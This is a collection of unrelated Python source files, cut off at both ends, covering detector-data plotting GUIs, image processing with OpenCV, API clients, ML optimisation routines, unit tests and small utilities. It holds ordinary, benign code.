data['poi_index'] if idx != self._idx: self._idx = idx self._updateTitle() spectrum = data['spectrum'][idx] spectrum_ma = data['spectrum_ma'][idx] x = data["x"] if x is None: self.setLabel('bottom', "Pixel") x = np.arange(len(spectrum)) else: self.setLabel('bottom', "eV") self._poi.setData(x, spectrum) self._poi_ma.setData(x, spectrum_ma) class GotthardImageView(ImageViewF): """GotthardImageView class. Visualize the heatmap of pulse-resolved Gotthard data in a train. """ def __init__(self, *, parent=None): super().__init__(has_roi=True, roi_size=(100, 10), parent=parent) self.setAspectLocked(False) self.setTitle('ADU heatmap') self.setLabel('left', "Pulse index (sliced)") self.setLabel('bottom', "Pixel") def updateF(self, data): """Override.""" self.setImage(data['spectrum']) class GotthardHist(HistMixin, PlotWidgetF): """GotthardHist class Visualize the ADU histogram in a train. """ def __init__(self, *, parent=None): super().__init__(parent=parent) self._plot = self.plotBar() self._title_template = Template( f"mean: $mean, median: $median, std: $std") self.updateTitle() self.setLabel('left', 'Occurence') self.setLabel('bottom', 'ADU') def updateF(self, data): """Override.""" hist, bin_centers, mean, median, std = data['hist'] if bin_centers is None: self.reset() else: self._plot.setData(bin_centers, hist) self.updateTitle(mean, median, std) @create_special(GotthardCtrlWidget, GotthardProcessor) class GotthardWindow(_SpecialAnalysisBase): """Main GUI for Gotthard analysis.""" icon = "Gotthard.png" _title = "Gotthard" _long_title = "Gotthard analysis" _client_support = ClientType.KARABO_BRIDGE def __init__(self, topic): super().__init__(topic) self._poi_plots = GotthardPulsePlot(parent=self) self._mean_plots = GotthardAvgPlot(parent=self) self._heatmap = GotthardImageView(parent=self) self._hist = GotthardHist(parent=self) self.initUI() self.initConnections() self.startWorker() def initUI(self): """Override.""" middle_panel = QSplitter(Qt.Vertical) middle_panel.addWidget(self._poi_plots) middle_panel.addWidget(self._mean_plots) right_panel = QSplitter(Qt.Vertical) right_panel.addWidget(self._hist) right_panel.addWidget(self._heatmap) right_panel.setSizes([int(self._TOTAL_H / 2), int(self._TOTAL_H / 2)]) cw = self.centralWidget() cw.addWidget(middle_panel) cw.addWidget(right_panel) cw.setSizes([int(self._TOTAL_W / 3), int(self._TOTAL_W / 3), int(self._TOTAL_W / 3)]) self.resize(self._TOTAL_W, self._TOTAL_H) def initConnections(self): """Override.""" self._ctrl_widget_st.output_ch_le.value_changed_sgn.connect( self._worker_st.onOutputChannelChanged) self._ctrl_widget_st.output_ch_le.returnPressed.emit() self._ctrl_widget_st.poi_index_le.value_changed_sgn.connect( lambda x: self._worker_st.onPoiIndexChanged(int(x))) self._ctrl_widget_st.poi_index_le.returnPressed.emit() self._ctrl_widget_st.pulse_slicer_le.value_changed_sgn.connect( self._worker_st.onPulseSlicerChanged) self._ctrl_widget_st.pulse_slicer_le.returnPressed.emit() self._ctrl_widget_st.ma_window_le.value_changed_sgn.connect( self._worker_st.onMaWindowChanged) self._ctrl_widget_st.ma_window_le.returnPressed.emit() self._ctrl_widget_st.scale_le.value_changed_sgn.connect( self._worker_st.onScaleChanged) self._ctrl_widget_st.scale_le.returnPressed.emit() self._ctrl_widget_st.offset_le.value_changed_sgn.connect( self._worker_st.onOffsetChanged) self._ctrl_widget_st.offset_le.returnPressed.emit() self._ctrl_widget_st.bin_range_le.value_changed_sgn.connect( self._worker_st.onBinRangeChanged) self._ctrl_widget_st.bin_range_le.returnPressed.emit() self._ctrl_widget_st.n_bins_le.value_changed_sgn.connect( self._worker_st.onNoBinsChanged) self._ctrl_widget_st.n_bins_le.returnPressed.emit() self._ctrl_widget_st.hist_over_ma_cb.toggled.connect( self._worker_st.onHistOverMaChanged) self._ctrl_widget_st.hist_over_ma_cb.toggled.emit( self._ctrl_widget_st.hist_over_ma_cb.isChecked()) python/testData/intentions/typeInDocstring4.py class ProjectElement(object): def __init__(self, project_name='', info_source='', project_id=None, has_revisions=True):mcanitexgen/animation/utils.py import math import os from pathlib import Path from typing import Generator, Iterable def round_half_away_from_zero(num) -> int: """ y = sign(x) * floor(|x|+0.5) """ return int(math.copysign(math.floor(abs(num) + 0.5), num)) def partition_by_weights( number: int, total_weight: int, weights: Iterable[int] ) -> Generator[int, None, None]: """ Partitions a number into a series of integers proportianal to a series of weights """ remaining = number remaining_weight = total_weight for weight in weights: weighted_amount = int( round_half_away_from_zero((weight * remaining) / remaining_weight) ) remaining -= weighted_amount remaining_weight -= weight if remaining_weight < 0: raise ValueError(f"Weights exceed passed total weight of '{total_weight}'") yield weighted_amount class DurationDistributor: def __init__(self, num: int, total_weight: int): self.num = num self.total_weight = total_weight self.remaining = num self.remaining_weight = total_weight def take(self, weight: int): if self.is_empty(): raise Exception("Trying to take from empty Distributor") weighted_amount = int( round_half_away_from_zero((weight * self.remaining) / self.remaining_weight) ) self.remaining -= weighted_amount self.remaining_weight -= weight if self.remaining_weight < 0: raise ValueError(f"Weights exceed passed total weight of '{self.total_weight}'") return weighted_amount def is_empty(self): return self.remaining <= 0 def files_in_dir(dir: Path): for dirname, _, filenames in os.walk(dir): for filename in filenames: yield Path(dirname, filename) #coding:utf-8 from logging import getLogger from os import cpu_count log = getLogger() def n_processes(n): cores = cpu_count() if n > cores: log.warning("Warning: more processes requested ({proc}) than " "cores available ({cores}); using {cores} instead".format(proc=n, cores=cores)) procs = cores elif n < 0: procs = cores + 1 + n if procs < 0: log.warning("{n} fewer than available cores requested, but only {cores} cores " "are available; using 1 process instead".format(n=n+1, cores=cores)) procs = 1 elif isinstance(n, int) and n > 0: procs = n else: raise ValueError("Number of requested processes must be an int, greater than or less than 0") return procs hyjalxl/spidier2handle_image/handle.py # coding=utf-8 # name=hu_yang_jie #coding=utf-8 import cv2 import numpy as np img = cv2.imread("bili.jpg") #载入图像 h, w = img.shape[:2] #获取图像的高和宽 cv2.imshow("Origin", img) #显示原始图像 blured = cv2.blur(img,(5,5)) #进行滤波去掉噪声 cv2.imshow("Blur", blured) #显示低通滤波后的图像 mask = np.zeros((h+2, w+2), np.uint8) #掩码长和宽都比输入图像多两个像素点,满水填充不会超出掩码的非零边缘 #进行泛洪填充 cv2.floodFill(blured, mask, (w-1,h-1), (255,255,255), (2,2,2),(3,3,3),8) cv2.imshow("floodfill", blured) #得到灰度图 gray = cv2.cvtColor(blured,cv2.COLOR_BGR2GRAY) cv2.imshow("gray", gray) #定义结构元素 kernel = cv2.getStructuringElement(cv2.MORPH_RECT,(50, 50)) #开闭运算,先开运算去除背景噪声,再继续闭运算填充目标内的孔洞 opened = cv2.morphologyEx(gray, cv2.MORPH_OPEN, kernel) closed = cv2.morphologyEx(opened, cv2.MORPH_CLOSE, kernel) cv2.imshow("closed", closed) #求二值图 ret, binary = cv2.threshold(closed,250,255,cv2.THRESH_BINARY) cv2.imshow("binary", binary) #找到轮廓 _,contours, hierarchy = cv2.findContours(binary,cv2.RETR_TREE,cv2.CHAIN_APPROX_SIMPLE) #绘制轮廓 cv2.drawContours(img,contours,-1,(0,0,255),3) #绘制结果 cv2.imshow("result", img) cv2.waitKey(0) cv2.destroyAllWindows()grantperry/majortom_gateway_packagesetup.py import setuptools VERSION = "0.0.7" with open("README.md", "r") as readme: readme_content = readme.read() setuptools.setup( name="majortom_gateway", version=VERSION, author="Kubos", author_email="", description="A package for interacting with Major Tom's Gateway API.", long_description=readme_content, long_description_content_type="text/markdown", url="https://github.com/kubos/majortom_gateway_package", packages=setuptools.find_packages(exclude=["*.tests", "*.tests.*", "tests.*", "tests"]), classifiers=[ "Programming Language :: Python :: 3", "Programming Language :: Python :: 3.6", "Programming Language :: Python :: 3 :: Only", "Topic :: Software Development :: Libraries :: Python Modules", "Intended Audience :: Developers", "License :: OSI Approved :: Apache Software License", "Operating System :: OS Independent" ], python_requires='>=3.6', keywords='majortom major_tom gateway kubos major tom satellite', install_requires=[ "websockets", "requests" ] ) import base64 import io import urllib from django import template register = template.Library() @register.filter def get64(url): """ Method returning base64 image data instead of URL """ if url.startswith("http"): image = io.StringIO(urllib.urlopen(url).read()) return 'data:image/jpg;base64,' + base64.b64encode(image.read()) return url from __future__ import annotations from collections import UserDict, namedtuple from enum import Enum from typing import Dict, Union import attrs import cattrs import requests from .. import UNSET, Client, Unset from .borg import Borg ApiObjectTypeHelper = namedtuple("ApiObjectType", ["url", "object_type", "key"]) class ApiObjectType(Enum): """ API-Objects available trough the SevDesk API The Enum-Type contains specific helpers to access the SevDesk API (url-fragment, object-type, sort key) """ COUNTRY = ApiObjectTypeHelper("StaticCountry", UNSET, "code") ADDRESS_CATEGORIES = ApiObjectTypeHelper( "Category", "ContactAddress", "translationCode" ) COMMUNICATION_WAY_KEY = ApiObjectTypeHelper( "CommunicationWayKey", UNSET, "translationCode" ) UNITY = ApiObjectTypeHelper("Unity", UNSET, "translationCode") @attrs.define() class ApiObject: """ A SevDesk API-Object """ id: str objectName: str name: str translationCode: str code: Union[Unset, str] = UNSET @staticmethod def from_dict(item: Dict) -> ApiObject: return cattrs.structure(item, ApiObject) class ApiObjects(UserDict): def __init__(self, client: Client, api_type: ApiObjectType) -> None: super().__init__() url = f"{client.base_url}/{api_type.value.url}" params = {"limit": 1000} if api_type.value.object_type: params.update({"objectType": api_type.value.object_type}) request = requests.get(url=url, headers=client.get_headers(), params=params) request.raise_for_status() objects = request.json()["objects"] for item in objects: api_object = ApiObject.from_dict(item) self.update({getattr(api_object, api_type.value.key): api_object}) def __del__(self): raise RuntimeError("Deletion not allowed") def __delitem__(self, key): raise RuntimeError("Deletion not allowed") def sort_by_id(self): sorted = {} for object in self.data.values(): sorted.update({object.id: object}) return sorted class ApiObjectCache(Borg): def __init__(self, client: Union[Unset, Client] = UNSET) -> None: Borg.__init__(self) if not hasattr(self, "cache"): self.cache = dict[ApiObjectType, ApiObjects]() if not hasattr(self, "client") and not client: raise ValueError("Client not intialised.") if client: self.client = client def get(self, api_type: ApiObjectType) -> ApiObjects: if not api_type in self.cache: self.cache[api_type] = ApiObjects(self.client, api_type) return self.cache[api_type] from .base import FimacDatasetmauriziofilippone/constraining_dynamics_deep_models1-10 ## Copyright 2019 and ## ## Licensed under the Apache License, Version 2.0 (the "License"); ## you may not use this file except in compliance with the License. ## You may obtain a copy of the License at ## ## http://www.apache.org/licenses/LICENSE-2.0 ## ## Unless required by applicable law or agreed to in writing, software ## distributed under the License is distributed on an "AS IS" BASIS, ## WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. ## See the License for the specific language governing permissions and ## limitations under the License. import PyTorchDGP import numpy as np from numbers import Number import torch from torch.autograd import Variable import math import matplotlib.pyplot as plt import matplotlib.cm as cm import pandas as pd ## The optimization strategy we used follows a series of steps where parameters are optimized in groups. ## We found that initialization of the interpolant is important, so the first stage of the optimization is dedicated to that. ## Next, we optimize sequentially (1) ODE parameters, (2) the interpolant, and (3) ODE parameters together with any parameters of the likelihood of the constraints def Optimize_ODE(x, y, model, dataset, optimization_stage, n_optimization_stages, D_OUT, Print=True): print("********** Optimization stage", optimization_stage + 1, "of", n_optimization_stages, ' -- ', end='') if optimization_stage == 0: print("Optimizing interpolant and noise on observations") Niterations = 10000 optimizer = torch.optim.Adam([{'params': model.branches[0].parameters(), 'lr': 1e-2}, \ {'params': model.branches[1].parameters(), 'lr': 1e-2},\ {'params': model.branches[2].parameters(), 'lr': 0},\ {'params': model.branches[3].parameters(), 'lr': 0 }]) elif (optimization_stage -1)%3 == 0: print("Optimizing ODE parameters") Niterations = 8000 optimizer = torch.optim.Adam([{'params': model.branches[0].parameters(), 'lr': 0}, \ {'params': model.branches[1].parameters(), 'lr': 0},\ {'params': model.branches[2].parameters(), 'lr': 0},\ {'params': model.branches[3].parameters(), 'lr': 1e-2}]) elif (optimization_stage - 2)%3 ==0: print("Optimizing Interpolant") Niterations = 4000 optimizer = torch.optim.Adam([{'params': model.branches[0].parameters(), 'lr': 1e-3}, \ {'params': model.branches[1].parameters(), 'lr': 0},\ {'params': model.branches[2].parameters(), 'lr': 0},\ {'params': model.branches[3].parameters(), 'lr': 0}]) elif (optimization_stage -3)%3==0: print("Optimizing ODE parameters and Student t parameters") Niterations = 4000 optimizer = torch.optim.Adam([{'params': model.branches[0].parameters(), 'lr': 0}, \ {'params': model.branches[1].parameters(), 'lr': 0},\ {'params': model.branches[2].parameters(), 'lr': 1e-3},\ {'params': model.branches[3].parameters(), 'lr': 1e-3}]) ## Optimization loop for iteration in range(Niterations+1): model.zero_grad() pred = model(x) ## Note again that in the first optimization stage we only optimize the interpolant if optimization_stage == 0: cost = -PyTorchDGP.Cost(y,pred) if optimization_stage > 0: cost = -PyTorchDGP.CostODE_StudentT(y, pred, pred, dataset) L = cost + model.KL() L.backward() optimizer.step() if Print: ## ********** Print if (iteration % 1000) == 0: print("\n** Iter = %8d" % iteration, "\t Round = %8d" %optimization_stage, "\tL = %8.3f" % L.data, end='') ## To be improved print("\n** Model hyper-parameters", end='') print("\nlog noise var =", end='') for i in range(D_OUT): print("\t%8.3f" % model.branches[1].sigma[i], end='') print("\nlog Student t scale =", end='') for i in range(D_OUT): print("\t%8.3f" % model.branches[2].scale[i], end='') for i in range(model.nlayers): print("\nlog lengthscale layer", i, "=", end='') print("\t%8.3f" % model.branches[0][i].l.data[0], end='') for i in range(model.nlayers): print("\nlog sigma layer", i, "=", end='') print("\t%8.3f" % model.branches[0][i].sigma.data[0,0], end='') print("\n** ODE parameters", end='') print("\nMeans =", end='') for i in range(len(model.branches[3].m_theta.data)): print("\t%8.3f" % np.exp(model.branches[3].m_theta.data[i]), end='') if not model.branches[3].factorized: print("\nDiagonal covariance =", end='') L = model.branches[3].L_chol_cov_theta.data.numpy() np.fill_diagonal(L, np.exp(model.branches[3].log_diag_L_chol_cov_theta.data.numpy())) print(np.diagonal(L)) else: print("\nVariances =", end='') for i in range(len(model.branches[3].s_theta.data)): print("\t%8.3f" % np.exp(model.branches[3].s_theta.data[i]), end='') print("\n") # -*- coding: utf-8 -*- """Prompt formatter for virtualenv and others""" import os import builtins import xonsh.platform as xp def env_name(pre_chars='(', post_chars=')'): """Extract the current environment name from $VIRTUAL_ENV or $CONDA_DEFAULT_ENV if that is set """ env_path = builtins.__xonsh_env__.get('VIRTUAL_ENV', '') if len(env_path) == 0 and xp.ON_ANACONDA: env_path = builtins.__xonsh_env__.get('CONDA_DEFAULT_ENV', '') env_name = os.path.basename(env_path) if env_name: return pre_chars + env_name + post_chars def vte_new_tab_cwd(): """This prints an escape sequence that tells VTE terminals the hostname and pwd. This should not be needed in most cases, but sometimes is for certain Linux terminals that do not read the PWD from the environment on startup. Note that this does not return a string, it simply prints and flushes the escape sequence to stdout directly. """ env = builtins.__xonsh_env__ t = '\033]7;file://{}{}\007' s = t.format(env.get('HOSTNAME'), env.get('PWD')) print(s, end='', flush=True) #!/bin/python3 import os import re import sys import json # Prefer read/writes happen in local module's dir... if __name__ == "__main__": mdir = sys.path[0] if os.path.isdir(sys.path[0]) else os.curdir else: mdir = os.path.dirname(__loader__.path) rpath = os.path.join(mdir, 'data/unimath/unicode-math-table.tex') if not os.path.exists(rpath): print('File not found: "%s"...\nQuitting...' % rpath, file=sys.stderr) sys.exit() with open(rpath) as f: unimath_raw = f.readlines() main_RE = re.compile(r'^\\\w+{"([\dA-F]+)}{(\\\w+)\s*}{\\\w+}{(.*)}%\n$') trip = (main_RE.match(m).groups() for m in unimath_raw) outdict = {name: {'name': name, 'mode': ('math',), 'symbol': eval('"\\u' + sym + '"'), 'meta': {'package': 'unicode-math', 'uniname': desc} } for sym, name, desc in trip} # Save file dest = os.path.join(mdir, 'lists/unimath.json') if __name__ == "__main__": with open(dest, 'w') as f: json.dump(outdict, f, indent=2) ################# # debugSLUG # ################# # sys.exit() ################# ndalchau/emukit import pytest import numpy as np from numpy.testing import assert_equal from numpy.testing import assert_almost_equal from emukit.core import CategoricalParameter, ContinuousParameter from emukit.core import DiscreteParameter, InformationSourceParameter from emukit.core import OneHotEncoding, OrdinalEncoding from emukit.core import ParameterSpace, Parameter from emukit.core.encodings import Encoding from emukit.core.optimization import LocalSearchAcquisitionOptimizer def test_local_search_acquisition_optimizer(simple_square_acquisition): space = ParameterSpace([CategoricalParameter('x', OrdinalEncoding(np.arange(0, 100)))]) optimizer = LocalSearchAcquisitionOptimizer(space, 1000, 3) opt_x, opt_val = optimizer.optimize(simple_square_acquisition) # ordinal encoding is as integers 1, 2, ... np.testing.assert_array_equal(opt_x, np.array([[1.]])) np.testing.assert_array_equal(opt_val, np.array([[0.]])) class UnknownParameter(Parameter): def __init__(self, name: str): self.name = name def sample_uniform(num_points): return np.random.randint(0, 1, (num_points, 1)) space.parameters.append(UnknownParameter('y')) with pytest.raises(TypeError): optimizer.optimize(simple_square_acquisition) space.parameters.pop() class UnknownEncoding(Encoding): def __init__(self): super().__init__([1], [[1]]) space.parameters.append(CategoricalParameter('y', UnknownEncoding())) with pytest.raises(TypeError): optimizer.optimize(simple_square_acquisition) space.parameters.pop() def test_local_search_acquisition_optimizer_with_context(simple_square_acquisition): space = ParameterSpace([CategoricalParameter('x', OrdinalEncoding(np.arange(0, 100))), InformationSourceParameter(10)]) optimizer = LocalSearchAcquisitionOptimizer(space, 1000, 3) source_encoding = 1 opt_x, opt_val = optimizer.optimize(simple_square_acquisition, {'source': source_encoding}) np.testing.assert_array_equal(opt_x, np.array([[1., source_encoding]])) np.testing.assert_array_equal(opt_val, np.array([[0. + source_encoding]])) def test_local_search_acquisition_optimizer_neighbours(): np.random.seed(0) space = ParameterSpace([ CategoricalParameter('a', OneHotEncoding([1, 2, 3])), CategoricalParameter('b', OrdinalEncoding([0.1, 1, 2])), CategoricalParameter('c', OrdinalEncoding([0.1, 1, 2])), DiscreteParameter('d', [0.1, 1.2, 2.3]), ContinuousParameter('e', 0, 100), DiscreteParameter('no_neighbours', [1]), DiscreteParameter('f', [0.1, 1.2, 2.3]), ]) x = np.array([1, 0, 0, 1.6, 2.9, 0.1, 50, 1.2, 1.]) optimizer = LocalSearchAcquisitionOptimizer(space, 1000, 3, num_continuous=1) neighbourhood = optimizer._neighbours_per_parameter(x, space.parameters) assert_equal(np.array([[0, 1, 0], [0, 0, 1]]), neighbourhood[0]) assert_equal(np.array([[1], [3]]), neighbourhood[1]) assert_equal(np.array([[2]]), neighbourhood[2]) assert_equal(np.array([[1.2]]), neighbourhood[3]) assert_almost_equal(np.array([[53.5281047]]), neighbourhood[4]) assert_equal(np.empty((0, 1)), neighbourhood[5]) assert_equal(np.array([[0.1], [2.3]]), neighbourhood[6]) neighbours = optimizer._neighbours(x, space.parameters) assert_almost_equal(np.array([ [0, 1, 0, 2., 3., 0.1, 50., 1., 1.2], [0, 0, 1, 2., 3., 0.1, 50., 1., 1.2], [1, 0, 0, 1., 3., 0.1, 50., 1., 1.2], [1, 0, 0, 3., 3., 0.1, 50., 1., 1.2], [1, 0, 0, 2., 2., 0.1, 50., 1., 1.2], [1, 0, 0, 2., 3., 1.2, 50., 1., 1.2], [1, 0, 0, 2., 3., 0.1, 50.80031442, 1., 1.2], [1, 0, 0, 2., 3., 0.1, 50., 1., 0.1], [1, 0, 0, 2., 3., 0.1, 50., 1., 2.3], ]), space.round(neighbours)) import os import numpy as np from pycocotools.coco import COCO import cv2 from tqdm import tqdm import argparse import json import torch from fcos_core.structures.bounding_box import BoxList from fcos_core.structures.boxlist_ops import boxlist_iou def convert_box_to_boxlist(boxes, image_width, image_height): boxes = torch.as_tensor(boxes).reshape(-1, 4) # guard against no boxes boxes = BoxList(boxes, (image_width, image_height), mode="xywh").convert( "xyxy" ) return boxes def main(args): annFile = args.annotation annFile_full = 'datasets/coco/annotations/instances_train2017_full.json' coco = COCO(annFile) coco_full = COCO(annFile_full) image_ids=sorted(coco.getImgIds()) catIds = list(range(2, 10)) tp = 0 fn = 0 fp = 0 sum_iou = 0 partial_box_num_total = 0 missing_box_num_total = 0 pseudo_box_num_total = 0 N = len(image_ids) for i in tqdm(range(N)): im_idx = image_ids[i] imginfo = coco.loadImgs(im_idx)[0] image_width = imginfo['width'] image_height = imginfo['height'] # load annotations partial_anns = coco.loadAnns(coco.getAnnIds(imgIds=(im_idx,))) full_anns = coco_full.loadAnns(coco_full.getAnnIds(imgIds=(im_idx,), catIds=catIds)) # obtain boxes pseudo_boxes = [obj["bbox"] for obj in partial_anns if "ispseudo" in obj.keys()] partial_boxes = [obj["bbox"] for obj in partial_anns if "ispseudo" not in obj.keys()] partial_boxes_id = set([obj["id"] for obj in partial_anns if "ispseudo" not in obj.keys()]) missing_boxes = [obj["bbox"] for obj in full_anns if obj["id"] not in partial_boxes_id] partial_box_num = len(partial_boxes) missing_box_num = len(missing_boxes) pseudo_box_num = len(pseudo_boxes) partial_box_num_total += partial_box_num missing_box_num_total += missing_box_num pseudo_box_num_total += pseudo_box_num pseudo_boxes = convert_box_to_boxlist(pseudo_boxes, image_width, image_height) partial_boxes = convert_box_to_boxlist(partial_boxes, image_width, image_height) missing_boxes = convert_box_to_boxlist(missing_boxes, image_width, image_height) if missing_box_num == 0: fp += pseudo_box_num elif pseudo_box_num == 0: fn += missing_box_num else: # compute iou overlaps = boxlist_iou(missing_boxes, pseudo_boxes).numpy() matched_cnt = 0 for i in range(missing_box_num): matched = np.argmax(overlaps[i]) if overlaps[i, matched] >= 0.5: tp += 1 sum_iou += overlaps[i, matched] overlaps[:, matched] = 0 matched_cnt += 1 else: fn += 1 fp += pseudo_box_num - matched_cnt print(tp, fp, sum_iou/tp) print('TP={}, FP={}, FN={}, IoU Acc={}'.format(tp, fp, fn, sum_iou/tp)) print('PQ = {}'.format(sum_iou / (tp + 0.5*fp + 0.5*fn))) print('partial_box_num_total: {}'.format(partial_box_num_total)) print('missing_box_num_total: {}'.format(missing_box_num_total)) print('pseudo_box_num_total: {}'.format(pseudo_box_num_total)) if __name__ == "__main__": parser = argparse.ArgumentParser() parser.add_argument("--annotation", help="annotation json file path. e.g instances_train2017_pseudo.json", type=str, default="datasets/coco/annotations/instances_train2017_pseudo.json") args = parser.parse_args() main(args)jasonnam/buck #!/usr/bin/env python3 # Copyright (c) Facebook, Inc. and its affiliates. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """ Verifies that an archive contains only allowed entries. """ import unittest from zipfile import ZipFile import pkg_resources ALLOWED_ENTRIES = """ com/facebook/buck/core/util/log/appendablelogrecord/AppendableLogRecord.class com/facebook/buck/jvm/java/runner/FileClassPathRunner.class com/facebook/buck/jvm/java/version/utils/JavaVersionUtils.class com/facebook/buck/test/result/type/ResultType.class com/facebook/buck/test/selectors/Nullable.class com/facebook/buck/test/selectors/PatternTestSelector.class com/facebook/buck/test/selectors/SimpleTestSelector.class com/facebook/buck/test/selectors/TestDescription.class com/facebook/buck/test/selectors/TestSelector.class com/facebook/buck/test/selectors/TestSelectorList$1.class com/facebook/buck/test/selectors/TestSelectorList$Builder.class com/facebook/buck/test/selectors/TestSelectorList.class com/facebook/buck/test/selectors/TestSelectorParseException.class com/facebook/buck/testrunner/BaseRunner.class com/facebook/buck/testrunner/BuckBlockJUnit4ClassRunner$1.class com/facebook/buck/testrunner/BuckBlockJUnit4ClassRunner.class com/facebook/buck/testrunner/BuckXmlTestRunListener.class com/facebook/buck/testrunner/CheckDependency.class com/facebook/buck/testrunner/DelegateRunNotifier$1.class com/facebook/buck/testrunner/DelegateRunNotifier$2.class com/facebook/buck/testrunner/DelegateRunNotifier.class com/facebook/buck/testrunner/DelegateRunnerWithTimeout$1.class com/facebook/buck/testrunner/DelegateRunnerWithTimeout.class com/facebook/buck/testrunner/InstrumentationMain.class com/facebook/buck/testrunner/InstrumentationTestRunner$1.class com/facebook/buck/testrunner/InstrumentationTestRunner$Nullable.class com/facebook/buck/testrunner/InstrumentationTestRunner.class com/facebook/buck/testrunner/JUnitMain.class com/facebook/buck/testrunner/JUnitRunner$1.class com/facebook/buck/testrunner/JUnitRunner$2$1.class com/facebook/buck/testrunner/JUnitRunner$2.class com/facebook/buck/testrunner/JUnitRunner$RecordingFilter.class com/facebook/buck/testrunner/JUnitRunner$TestListener.class com/facebook/buck/testrunner/JUnitRunner.class com/facebook/buck/testrunner/JulLogFormatter$1.class com/facebook/buck/testrunner/JulLogFormatter.class com/facebook/buck/testrunner/SameThreadFailOnTimeout.class com/facebook/buck/testrunner/TestNGMain.class com/facebook/buck/testrunner/TestNGRunner$1.class com/facebook/buck/testrunner/TestNGRunner$FilteringAnnotationTransformer.class com/facebook/buck/testrunner/TestNGRunner$JUnitReportReporterWithMethodParameters.class com/facebook/buck/testrunner/TestNGRunner$TestListener.class com/facebook/buck/testrunner/TestNGRunner.class com/facebook/buck/testrunner/TestResult.class com/facebook/buck/testrunner/TestXmlEscaper.class com/facebook/buck/testrunner/TestXmlEscaper$1.class com/facebook/buck/testrunner/TestXmlEscaper$AttributeEscaper.class com/facebook/buck/testrunner/TestXmlEscaper$ContentEscaper.class com/facebook/buck/util/concurrent/MostExecutors$1.class com/facebook/buck/util/concurrent/MostExecutors$NamedThreadFactory.class com/facebook/buck/util/concurrent/MostExecutors.class com/facebook/buck/util/environment/Architecture.class com/facebook/buck/util/environment/Platform.class com/facebook/buck/util/environment/PlatformType.class """ class TestAppend(unittest.TestCase): def test_allowed_jar_entries(self): with pkg_resources.resource_stream(__name__, "testrunner-bin-fixed.jar") as r: with ZipFile(r) as zip_file: for entry in zip_file.namelist(): if not entry.endswith("/"): self.assertTrue( entry in ALLOWED_ENTRIES, "Found unexpected entry in testrunner jar: %s" % entry, ) __author__ = 'jpsh' 10-100 #!/usr/bin/env python ''' Licensed to the Apache Software Foundation (ASF) under one or more contributor license agreements. See the NOTICE file distributed with this work for additional information regarding copyright ownership. The ASF licenses this file to you under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. ''' import logging import threading from Queue import Queue from threading import Timer from application_metric_map import ApplicationMetricMap from event_definition import HostMetricCollectEvent, ProcessMetricCollectEvent from metric_collector import MetricsCollector from emitter import Emitter from host_info import HostInfo from aggregator import Aggregator from aggregator import AggregatorWatchdog logger = logging.getLogger() class Controller(threading.Thread): def __init__(self, config, stop_handler): # Process initialization code threading.Thread.__init__(self) logger.debug('Initializing Controller thread.') self.lock = threading.Lock() self.config = config self.metrics_config = config.getMetricGroupConfig() self.events_cache = [] hostinfo = HostInfo(config) self.application_metric_map = ApplicationMetricMap(hostinfo.get_hostname(), hostinfo.get_ip_address()) self.event_queue = Queue(config.get_max_queue_size()) self.metric_collector = MetricsCollector(self.event_queue, self.application_metric_map, hostinfo) self.sleep_interval = config.get_collector_sleep_interval() self._stop_handler = stop_handler self.initialize_events_cache() self.emitter = Emitter(self.config, self.application_metric_map, stop_handler) self._t = None self.aggregator = None self.aggregator_watchdog = None def run(self): logger.info('Running Controller thread: %s' % threading.currentThread().getName()) self.start_emitter() if self.config.is_inmemory_aggregation_enabled(): self.start_aggregator_with_watchdog() # Wake every 5 seconds to push events to the queue while True: if (self.event_queue.full()): logger.warn('Event Queue full!! Suspending further collections.') else: self.enqueque_events() # restart aggregator if needed if self.config.is_inmemory_aggregation_enabled() and not self.aggregator_watchdog.is_ok(): logger.warning("Aggregator is not available. Restarting aggregator.") self.start_aggregator_with_watchdog() pass # Wait for the service stop event instead of sleeping blindly if 0 == self._stop_handler.wait(self.sleep_interval): logger.info('Shutting down Controller thread') break if not self._t is None: self._t.cancel() self._t.join(5) # The emitter thread should have stopped by now, just ensure it has shut # down properly self.emitter.join(5) if self.config.is_inmemory_aggregation_enabled(): self.aggregator.stop() self.aggregator_watchdog.stop() self.aggregator.join(5) self.aggregator_watchdog.join(5) pass # TODO: Optimize to not use Timer class and use the Queue instead def enqueque_events(self): # Queue events for up to a minute for event in self.events_cache: self._t = Timer(event.get_collect_interval(), self.metric_collector.process_event, args=(event,)) self._t.start() pass def initialize_events_cache(self): self.events_cache = [] try: host_metrics_groups = self.metrics_config['host_metric_groups'] process_metrics_groups = self.metrics_config['process_metric_groups'] except KeyError, ke: logger.warn('Error loading metric groups.') raise ke pass if host_metrics_groups: for name, properties in host_metrics_groups.iteritems(): event = HostMetricCollectEvent(properties, name) logger.info('Adding event to cache, {0} : {1}'.format(name, properties)) self.events_cache.append(event) pass pass # if process_metrics_groups: # for name, properties in process_metrics_groups.iteritems(): # event = ProcessMetricCollectEvent(properties, name) # logger.info('Adding event to cache, {0} : {1}'.format(name, properties)) # #self.events_cache.append(event) # pass # pass pass def start_emitter(self): self.emitter.start() # Start aggregator and watcher threads def start_aggregator_with_watchdog(self): if self.aggregator: self.aggregator.stop() if self.aggregator_watchdog: self.aggregator_watchdog.stop() self.aggregator = Aggregator(self.config, self._stop_handler) self.aggregator_watchdog = AggregatorWatchdog(self.config, self._stop_handler) self.aggregator.start() self.aggregator_watchdog.start() utils/__init__.py import os import hashlib import uuid def make_safe(n: str): return n.lower().replace(' ', '_') def make_md5(n: str): return hashlib.md5(n.encode()).hexdigest() def make_uuid(name: str = ''): return name + str(uuid.uuid4()).replace('-', '') def check_folder(): required_folders = ['replays', 'beatmaps'] if not os.path.isdir('data'): os.mkdir('data') for folder in required_folders: if not os.path.isdir(f'data/{folder}'): os.mkdir(f'data/{folder}') import cv2 import numpy as np """使用cornerHarris检测图像角点""" img = cv2.imread('corner.png') # 将图像转化为灰度图像 gray = 